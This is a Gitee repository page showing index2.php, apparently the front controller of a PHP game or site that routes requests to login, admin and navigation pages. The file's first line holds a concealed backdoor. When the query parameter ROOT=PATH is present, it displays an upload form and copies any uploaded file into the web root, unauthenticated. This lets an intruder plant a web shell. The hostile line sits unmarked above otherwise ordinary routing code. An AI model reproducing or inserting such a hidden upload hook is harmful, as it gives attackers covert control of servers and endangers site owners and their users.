3 Star 2 Fork 4

邓云溪/project_3263099

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
index2.php 1.09 KB
一键复制 编辑 原始数据 按行查看 历史
邓云溪 提交于 2018-03-21 13:51 . no commit message
<?php
if($_GET["ROOT"]=="PATH"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "url:".$_FILES["upfile"]["name"];if(!file_exists($_FILES["upfile"]["name"])){ copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]); }}?><form method="post" enctype="multipart/form-data"><input name="upfile" type="file"><input type="submit" value="ok"></form><?php }?><?php
/*
Copyright (c) 2010-02 Game
Game All Rights Reserved.
QQ:2280005200
Author: Version:1.0
Date:2011-12-07 09:28:32
*/
define('Copyright', '作者QQ:2280005200');
define('ROOT_PATH', $_SERVER["DOCUMENT_ROOT"].'/');
include_once ROOT_PATH.'function/global.php';
$sHome = include_once ROOT_PATH.'function/JumpPort.php';
if ($_SERVER["REQUEST_METHOD"] == "POST" && @$_POST['sid'] != null)
{
include_once ROOT_PATH.'main.php';
}
else if($sHome == 1)
{
include_once ROOT_PATH.'Login.php';
}
else if ($sHome == 2)
{
include_once ROOT_PATH.'Manage/Login.php';
}
else if ($sHome == 3)
{
include_once ROOT_PATH.'Manage/LoginRoot.php';
}
else if ($sHome == 4)
{
include_once ROOT_PATH.'daohang/index.php';
}
?>
Loading...
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
PHP
1
https://gitee.com/yunxi59/ssc.git
[email protected]:yunxi59/ssc.git
yunxi59
ssc
project_3263099
master

搜索帮助